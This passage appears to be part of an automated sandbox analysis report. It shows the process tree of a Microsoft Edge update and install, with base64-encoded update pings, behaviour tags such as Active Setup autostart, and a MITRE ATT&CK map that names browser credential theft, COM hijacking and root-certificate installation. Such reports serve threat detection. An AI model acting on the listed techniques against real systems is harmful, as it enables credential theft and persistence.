45MDIuNjciIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODE0MjM3MzQ1NzQwODQwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9Ii0xIiBhZD0iLTEiIHJkPSItMSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMzEuMC4yOTAzLjE0NiIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2NTg3Ij48dXBkYXRlY2hlY2svPjxwaW5nIHI9Ii0xIiByZD0iLTEiIHBpbmdfZnJlc2huZXNzPSJ7QzQxNUZBQTEtODhCMS00QjNELThDQ0MtNTkyRkFFMzhBRTgyfSIvPjwvYXBwPjwvcmVxdWVzdD4
  2⤵
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2508

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
- System Location Discovery: System Language Discovery
PID:712

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:4484
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RTEzM0M0NjUtMzQ3Ni00QjY0LUJGRTItRjA4QkRGQTlFMzJFfSIgdXNlcmlkPSJ7NkIzQjRBRjMtOTQ0OC00RDkzLUI1NzctMTRGNUFCM0U4NjcwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NzMxODlBNDUtMTZDRS00MkM2LUI5RUMtQkMwNjUwMzU4RDVEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxMDAiIGluc3RhbGxkYXRldGltZT0iMTcyODI5Mjg2MyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzcyNzY1NDU1NTcwMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjIyMTg1MDk2MTE0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2880
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\MicrosoftEdge_X64_131.0.2903.146.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\MicrosoftEdge_X64_131.0.2903.146.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
  2⤵
  PID:4912
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\MicrosoftEdge_X64_131.0.2903.146.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Installs/modifies Browser Helper Object
    - Drops file in Program Files directory
    - Modifies Internet Explorer settings
    - System policy modification
    PID:1580
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.265 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.146 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7000c2918,0x7ff7000c2924,0x7ff7000c2930
      4⤵
      PID:5312
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:6032
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.265 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{8863DF21-F778-435E-81D1-BB73FB60D0CB}\EDGEMITMP_2693A.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.146 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7000c2918,0x7ff7000c2924,0x7ff7000c2930
        5⤵
        
        PID:4568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
      4⤵
      PID:2424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.265 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.146 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7cbfa2918,0x7ff7cbfa2924,0x7ff7cbfa2930
        5⤵
        
        PID:5776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
      4⤵
      PID:6140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.265 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.146 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff7cbfa2918,0x7ff7cbfa2924,0x7ff7cbfa2930
        5⤵
        
        PID:180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Browser Extensions

T1176

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery